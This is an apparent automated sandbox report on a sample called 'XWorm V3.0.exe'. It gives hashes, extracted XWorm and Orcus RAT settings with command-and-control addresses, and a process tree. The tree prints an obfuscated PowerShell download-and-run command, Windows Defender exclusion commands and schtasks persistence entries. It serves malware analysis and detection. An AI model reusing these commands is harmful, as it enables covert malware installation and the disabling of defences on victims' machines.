Analysis
-
max time kernel
144s -
max time network
153s -
platform
windows7_x64 -
resource
win7-20240704-en -
resource tags
arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system -
submitted
16-07-2024 01:03
Static task
static1
Behavioral task
behavioral1
Sample
XWorm V3.0.exe
Resource
win7-20240704-en
Behavioral task
behavioral2
Sample
XWorm V3.0.exe
Resource
win10v2004-20240709-en
General
-
Target
XWorm V3.0.exe
-
Size
19.3MB
-
MD5
d7e85bc99cb79b98d64a6d4b8b7d041b
-
SHA1
137f70c449be88103e4f1abfa80658ccbd9ba3f9
-
SHA256
8dd83abb25a341413e009b4b6b0b12582382d99bc2f3d2b0d07c95bf3b8c0c81
-
SHA512
c35a74526edee423254a4335946a9d447c95a31a4acb9923ee667d074f9c4f84d0d5f6cf22bc6a23012ebe04ef4d6ad43bd2e55dc287d4dfe52a5d9b71f8d4f1
-
SSDEEP
393216:JZgqzDlLO/uc+9bPugF7cp4rTKiSVbafhkCvBeLfhfzm:JqctO/k9bPugypcKtVGhkckfBy
Malware Config
Extracted
xworm
147.185.221.18:43279
147.185.221.18:47186
147.185.221.18:45497
147.185.221.18:24123
147.185.221.18:41609
-
Install_directory
%ProgramData%
-
install_file
Discord.exe
Extracted
orcus
147.185.221.18:43279
1a3206b13a7141d7a10982ddf15a2503
-
autostart_method
Registry
-
enable_keylogger
false
-
install_path
%programfiles%\Orcus\Orcus.exe
-
reconnect_delay
10000
-
registry_keyname
Orcus
-
taskscheduler_taskname
Orcus
-
watchdog_path
AppData\OrcusWatchdog.exe
Signatures
-
Detect Xworm Payload 17 IoCs
Processes:
resource yara_rule behavioral1/files/0x0008000000018b6e-30.dat family_xworm behavioral1/files/0x0006000000018b89-35.dat family_xworm behavioral1/memory/2912-34-0x0000000000EF0000-0x0000000000F0A000-memory.dmp family_xworm behavioral1/files/0x0006000000018bac-39.dat family_xworm behavioral1/files/0x0009000000018bbf-47.dat family_xworm behavioral1/memory/2628-50-0x0000000000EE0000-0x0000000000F10000-memory.dmp family_xworm behavioral1/files/0x0007000000018bd4-53.dat family_xworm behavioral1/memory/2808-43-0x0000000001270000-0x0000000001286000-memory.dmp family_xworm behavioral1/memory/2780-42-0x0000000000A40000-0x0000000000A5E000-memory.dmp family_xworm behavioral1/memory/864-58-0x0000000000A30000-0x0000000000A48000-memory.dmp family_xworm behavioral1/memory/3040-455-0x00000000012B0000-0x00000000012E0000-memory.dmp family_xworm behavioral1/memory/1412-459-0x00000000000F0000-0x0000000000108000-memory.dmp family_xworm behavioral1/memory/2096-460-0x0000000000860000-0x0000000000876000-memory.dmp family_xworm behavioral1/memory/1636-461-0x0000000001170000-0x000000000118E000-memory.dmp family_xworm behavioral1/memory/1700-467-0x0000000000900000-0x0000000000918000-memory.dmp family_xworm behavioral1/memory/2976-468-0x00000000012C0000-0x00000000012DE000-memory.dmp family_xworm behavioral1/memory/2616-469-0x00000000011C0000-0x00000000011D6000-memory.dmp family_xworm -
Orcus main payload 1 IoCs
Processes:
resource yara_rule behavioral1/files/0x0009000000018d48-56.dat family_orcus -
Orcurs Rat Executable 2 IoCs
Processes:
resource yara_rule behavioral1/files/0x0009000000018d48-56.dat orcus behavioral1/memory/276-205-0x0000000000BC0000-0x0000000000CA8000-memory.dmp orcus -
Command and Scripting Interpreter: PowerShell 1 TTPs 21 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid Process 984 powershell.exe 2256 powershell.exe 2296 powershell.exe 1784 powershell.exe 2728 powershell.exe 2788 powershell.exe 832 powershell.exe 2680 powershell.exe 2040 powershell.exe 2948 powershell.exe 2908 powershell.exe 2216 powershell.exe 2968 powershell.exe 2664 powershell.exe 2464 powershell.exe 940 powershell.exe 396 powershell.exe 2352 powershell.exe 588 powershell.exe 2576 powershell.exe 2708 powershell.exe -
Drops startup file 9 IoCs
Processes:
4.exe1.exe2.exe5.exe3.exedescription ioc Process File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Discord_Update.lnk 4.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Discord.lnk 1.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Discord.lnk 1.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svhost.lnk 2.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svhost.lnk 2.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WindowsDefender.lnk 5.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\discord.lnk 3.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WindowsDefender.lnk 5.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Discord_Update.lnk 4.exe -
Executes dropped EXE 19 IoCs
Processes:
XWorm V3.0.exe1.exe2.exe3.exe4.exe5.exe6.exe7.exe7.exeOrcus.exeDiscord_Update.exeWindowsDefender.exediscord.exesvhost.exeDiscord_Update.exediscord.exeWindowsDefender.exesvhost.exepid Process 2820 XWorm V3.0.exe 2912 1.exe 2808 2.exe 2780 3.exe 2628 4.exe 864 5.exe 2596 6.exe 2976 7.exe 2480 7.exe 276 Orcus.exe 1216 3040 Discord_Update.exe 1412 WindowsDefender.exe 1636 discord.exe 2096 svhost.exe 2952 Discord_Update.exe 2976 discord.exe 1700 WindowsDefender.exe 2616 svhost.exe -
Loads dropped DLL 2 IoCs
Processes:
XWorm V3.0.exe7.exepid Process 2820 XWorm V3.0.exe 2480 7.exe -
Processes:
resource yara_rule behavioral1/files/0x000500000001a5b9-194.dat upx behavioral1/memory/2480-195-0x000007FEEAEE0000-0x000007FEEB34E000-memory.dmp upx -
Adds Run key to start application 2 TTPs 6 IoCs
Processes:
5.exe3.exe4.exeOrcus.exe2.exe1.exedescription ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2212144002-1172735686-1556890956-1000\Software\Microsoft\Windows\CurrentVersion\Run\WindowsDefender = "C:\\Users\\Admin\\AppData\\Roaming\\WindowsDefender.exe" 5.exe Set value (str) \REGISTRY\USER\S-1-5-21-2212144002-1172735686-1556890956-1000\Software\Microsoft\Windows\CurrentVersion\Run\discord = "C:\\Users\\Admin\\AppData\\Roaming\\discord.exe" 3.exe Set value (str) \REGISTRY\USER\S-1-5-21-2212144002-1172735686-1556890956-1000\Software\Microsoft\Windows\CurrentVersion\Run\Discord_Update = "C:\\Users\\Admin\\AppData\\Roaming\\Discord_Update.exe" 4.exe Set value (str) \REGISTRY\USER\S-1-5-21-2212144002-1172735686-1556890956-1000\Software\Microsoft\Windows\CurrentVersion\Run\Orcus = "\"C:\\Program Files\\Orcus\\Orcus.exe\"" Orcus.exe Set value (str) \REGISTRY\USER\S-1-5-21-2212144002-1172735686-1556890956-1000\Software\Microsoft\Windows\CurrentVersion\Run\svhost = "C:\\Users\\Admin\\AppData\\Roaming\\svhost.exe" 2.exe Set value (str) \REGISTRY\USER\S-1-5-21-2212144002-1172735686-1556890956-1000\Software\Microsoft\Windows\CurrentVersion\Run\Discord = "C:\\ProgramData\\Discord.exe" 1.exe -
Looks up external IP address via web service 5 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 4 ip-api.com 5 ip-api.com 6 ip-api.com 2 ip-api.com 3 ip-api.com -
Drops file in Program Files directory 3 IoCs
Processes:
6.exedescription ioc Process File created C:\Program Files\Orcus\Orcus.exe 6.exe File opened for modification C:\Program Files\Orcus\Orcus.exe 6.exe File created C:\Program Files\Orcus\Orcus.exe.config 6.exe -
Detects Pyinstaller 1 IoCs
Processes:
resource yara_rule behavioral1/files/0x0006000000018f82-65.dat pyinstaller -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Scheduled Task/Job: Scheduled Task 1 TTPs 5 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exepid Process 1296 schtasks.exe 568 schtasks.exe 1480 schtasks.exe 1540 schtasks.exe 2996 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 25 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe1.exe2.exe5.exe3.exepid Process 2708 powershell.exe 2948 powershell.exe 2788 powershell.exe 2908 powershell.exe 2728 powershell.exe 2664 powershell.exe 2464 powershell.exe 2256 powershell.exe 2216 powershell.exe 984 powershell.exe 832 powershell.exe 940 powershell.exe 2296 powershell.exe 396 powershell.exe 2680 powershell.exe 2040 powershell.exe 2968 powershell.exe 2352 powershell.exe 588 powershell.exe 1784 powershell.exe 2576 powershell.exe 2912 1.exe 2808 2.exe 864 5.exe 2780 3.exe -
Suspicious use of AdjustPrivilegeToken 39 IoCs
Processes:
powershell.exe3.exe1.exe2.exe4.exe5.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exeDiscord_Update.exeWindowsDefender.exesvhost.exediscord.exeDiscord_Update.exeWindowsDefender.exediscord.exesvhost.exedescription pid Process Token: SeDebugPrivilege 2708 powershell.exe Token: SeDebugPrivilege 2780 3.exe Token: SeDebugPrivilege 2912 1.exe Token: SeDebugPrivilege 2808 2.exe Token: SeDebugPrivilege 2628 4.exe Token: SeDebugPrivilege 864 5.exe Token: SeDebugPrivilege 2948 powershell.exe Token: SeDebugPrivilege 2788 powershell.exe Token: SeDebugPrivilege 2908 powershell.exe Token: SeDebugPrivilege 2728 powershell.exe Token: SeDebugPrivilege 2664 powershell.exe Token: SeDebugPrivilege 2464 powershell.exe Token: SeDebugPrivilege 2256 powershell.exe Token: SeDebugPrivilege 2216 powershell.exe Token: SeDebugPrivilege 984 powershell.exe Token: SeDebugPrivilege 832 powershell.exe Token: SeDebugPrivilege 940 powershell.exe Token: SeDebugPrivilege 2296 powershell.exe Token: SeDebugPrivilege 396 powershell.exe Token: SeDebugPrivilege 2680 powershell.exe Token: SeDebugPrivilege 2040 powershell.exe Token: SeDebugPrivilege 2968 powershell.exe Token: SeDebugPrivilege 2352 powershell.exe Token: SeDebugPrivilege 588 powershell.exe Token: SeDebugPrivilege 1784 powershell.exe Token: SeDebugPrivilege 2576 powershell.exe Token: SeDebugPrivilege 2912 1.exe Token: SeDebugPrivilege 2808 2.exe Token: SeDebugPrivilege 864 5.exe Token: SeDebugPrivilege 2780 3.exe Token: SeDebugPrivilege 2628 4.exe Token: SeDebugPrivilege 3040 Discord_Update.exe Token: SeDebugPrivilege 1412 WindowsDefender.exe Token: SeDebugPrivilege 2096 svhost.exe Token: SeDebugPrivilege 1636 discord.exe Token: SeDebugPrivilege 2952 Discord_Update.exe Token: SeDebugPrivilege 1700 WindowsDefender.exe Token: SeDebugPrivilege 2976 discord.exe Token: SeDebugPrivilege 2616 svhost.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
Processes:
Orcus.exepid Process 276 Orcus.exe -
Suspicious use of SendNotifyMessage 1 IoCs
Processes:
Orcus.exepid Process 276 Orcus.exe -
Suspicious use of SetWindowsHookEx 4 IoCs
Processes:
1.exe2.exe5.exe3.exepid Process 2912 1.exe 2808 2.exe 864 5.exe 2780 3.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
XWorm V3.0.execmd.exeXWorm V3.0.exe6.execsc.exe7.exe1.exe2.exe5.exe4.exe3.exedescription pid Process procid_target PID 2064 wrote to memory of 2920 2064 XWorm V3.0.exe 29 PID 2064 wrote to memory of 2920 2064 XWorm V3.0.exe 29 PID 2064 wrote to memory of 2920 2064 XWorm V3.0.exe 29 PID 2920 wrote to memory of 2708 2920 cmd.exe 31 PID 2920 wrote to memory of 2708 2920 cmd.exe 31 PID 2920 wrote to memory of 2708 2920 cmd.exe 31 PID 2064 wrote to memory of 2820 2064 XWorm V3.0.exe 32 PID 2064 wrote to memory of 2820 2064 XWorm V3.0.exe 32 PID 2064 wrote to memory of 2820 2064 XWorm V3.0.exe 32 PID 2820 wrote to memory of 2912 2820 XWorm V3.0.exe 33 PID 2820 wrote to memory of 2912 2820 XWorm V3.0.exe 33 PID 2820 wrote to memory of 2912 2820 XWorm V3.0.exe 33 PID 2820 wrote to memory of 2808 2820 XWorm V3.0.exe 34 PID 2820 wrote to memory of 2808 2820 XWorm V3.0.exe 34 PID 2820 wrote to memory of 2808 2820 XWorm V3.0.exe 34 PID 2820 wrote to memory of 2780 2820 XWorm V3.0.exe 35 PID 2820 wrote to memory of 2780 2820 XWorm V3.0.exe 35 PID 2820 wrote to memory of 2780 2820 XWorm V3.0.exe 35 PID 2820 wrote to memory of 2628 2820 XWorm V3.0.exe 36 PID 2820 wrote to memory of 2628 2820 XWorm V3.0.exe 36 PID 2820 wrote to memory of 2628 2820 XWorm V3.0.exe 36 PID 2820 wrote to memory of 864 2820 XWorm V3.0.exe 37 PID 2820 wrote to memory of 864 2820 XWorm V3.0.exe 37 PID 2820 wrote to memory of 864 2820 XWorm V3.0.exe 37 PID 2820 wrote to memory of 2596 2820 XWorm V3.0.exe 38 PID 2820 wrote to memory of 2596 2820 XWorm V3.0.exe 38 PID 2820 wrote to memory of 2596 2820 XWorm V3.0.exe 38 PID 2820 wrote to memory of 2976 2820 XWorm V3.0.exe 91 PID 2820 wrote to memory of 2976 2820 XWorm V3.0.exe 91 PID 2820 wrote to memory of 2976 2820 XWorm V3.0.exe 91 PID 2596 wrote to memory of 3020 2596 6.exe 40 PID 2596 wrote to memory of 3020 2596 6.exe 40 PID 2596 wrote to memory of 3020 2596 6.exe 40 PID 3020 wrote to memory of 608 3020 csc.exe 42 PID 3020 wrote to memory of 608 3020 csc.exe 42 PID 3020 wrote to memory of 608 3020 csc.exe 42 PID 2976 wrote to memory of 2480 2976 7.exe 43 PID 2976 wrote to memory of 2480 2976 7.exe 43 PID 2976 wrote to memory of 2480 2976 7.exe 43 PID 2596 wrote to memory of 276 2596 6.exe 44 PID 2596 wrote to memory of 276 2596 6.exe 44 PID 2596 wrote to memory of 276 2596 6.exe 44 PID 2912 wrote to memory of 2908 2912 1.exe 46 PID 2912 wrote to memory of 2908 2912 1.exe 46 PID 2912 wrote to memory of 2908 2912 1.exe 46 PID 2808 wrote to memory of 2948 2808 2.exe 47 PID 2808 wrote to memory of 2948 2808 2.exe 47 PID 2808 wrote to memory of 2948 2808 2.exe 47 PID 864 wrote to memory of 2788 864 5.exe 48 PID 864 wrote to memory of 2788 864 5.exe 48 PID 864 wrote to memory of 2788 864 5.exe 48 PID 2628 wrote to memory of 2728 2628 4.exe 49 PID 2628 wrote to memory of 2728 2628 4.exe 49 PID 2628 wrote to memory of 2728 2628 4.exe 49 PID 2780 wrote to memory of 2664 2780 3.exe 53 PID 2780 wrote to memory of 2664 2780 3.exe 53 PID 2780 wrote to memory of 2664 2780 3.exe 53 PID 2808 wrote to memory of 2464 2808 2.exe 56 PID 2808 wrote to memory of 2464 2808 2.exe 56 PID 2808 wrote to memory of 2464 2808 2.exe 56 PID 2628 wrote to memory of 2256 2628 4.exe 58 PID 2628 wrote to memory of 2256 2628 4.exe 58 PID 2628 wrote to memory of 2256 2628 4.exe 58 PID 864 wrote to memory of 2216 864 5.exe 60 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\XWorm V3.0.exe"C:\Users\Admin\AppData\Local\Temp\XWorm V3.0.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:2064 -
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Roaming\XWorm_V3.0.bat" "2⤵
- Suspicious use of WriteProcessMemory
PID:2920 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -NoProf"i"le -Executio"n"Policy B"y"pass -Window"S"tyle Hidden -Co"m"mand "Inv"o"ke-W"e"bRequest -Uri 'https://github.com/GoldHourse/OPTIMIZER/raw/main/XWorm_V3.0.exe' -Ou"t"File 'XWorm_V3.0.exe';" "Start-Process -FilePath 'XWorm_V3.0.exe'"3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2708
-
-
-
C:\Users\Admin\AppData\Roaming\XWorm V3.0.exe"C:\Users\Admin\AppData\Roaming\XWorm V3.0.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2820 -
C:\Users\Admin\AppData\Roaming\1.exe"C:\Users\Admin\AppData\Roaming\1.exe"3⤵
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2912 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\1.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2908
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '1.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:984
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\Discord.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:940
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Discord.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:588
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Discord" /tr "C:\ProgramData\Discord.exe"4⤵
- Scheduled Task/Job: Scheduled Task
PID:1540
-
-
-
C:\Users\Admin\AppData\Roaming\2.exe"C:\Users\Admin\AppData\Roaming\2.exe"3⤵
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2808 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\2.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2948
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '2.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2464
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\svhost.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:396
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svhost.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2968
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\svhost.exe"4⤵
- Scheduled Task/Job: Scheduled Task
PID:2996
-
-
-
C:\Users\Admin\AppData\Roaming\3.exe"C:\Users\Admin\AppData\Roaming\3.exe"3⤵
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2780 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\3.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2664
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '3.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:832
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\discord.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2040
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'discord.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1784
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "discord" /tr "C:\Users\Admin\AppData\Roaming\discord.exe"4⤵
- Scheduled Task/Job: Scheduled Task
PID:568
-
-
-
C:\Users\Admin\AppData\Roaming\4.exe"C:\Users\Admin\AppData\Roaming\4.exe"3⤵
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2628 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\4.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2728
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '4.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2256
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Discord_Update.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2296
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Discord_Update.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2576
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Discord_Update" /tr "C:\Users\Admin\AppData\Roaming\Discord_Update.exe"4⤵
- Scheduled Task/Job: Scheduled Task
PID:1480
-
-
-
C:\Users\Admin\AppData\Roaming\5.exe"C:\Users\Admin\AppData\Roaming\5.exe"3⤵
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:864 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\5.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2788
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '5.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2216
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\WindowsDefender.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2680
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'WindowsDefender.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2352
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "WindowsDefender" /tr "C:\Users\Admin\AppData\Roaming\WindowsDefender.exe"4⤵
- Scheduled Task/Job: Scheduled Task
PID:1296
-
-
-
C:\Users\Admin\AppData\Roaming\6.exe"C:\Users\Admin\AppData\Roaming\6.exe"3⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:2596 -
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\9smatpdu.cmdline"4⤵
- Suspicious use of WriteProcessMemory
PID:3020 -
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES27EC.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC27EB.tmp"5⤵PID:608
-
-
-
C:\Program Files\Orcus\Orcus.exe"C:\Program Files\Orcus\Orcus.exe"4⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:276
-
-
-
C:\Users\Admin\AppData\Roaming\7.exe"C:\Users\Admin\AppData\Roaming\7.exe"3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2976 -
C:\Users\Admin\AppData\Roaming\7.exe"C:\Users\Admin\AppData\Roaming\7.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2480
-
-
-
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "108196391931600450721056642541075254560-183627000210658113384898043071169406501"1⤵PID:2976
-
C:\Windows\system32\taskeng.exetaskeng.exe {C41B241E-874D-426D-B543-92B88FCF6476} S-1-5-21-2212144002-1172735686-1556890956-1000:MVFYZPLM\Admin:Interactive:[1]1⤵PID:2928
-
C:\Users\Admin\AppData\Roaming\Discord_Update.exeC:\Users\Admin\AppData\Roaming\Discord_Update.exe2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3040
-
-
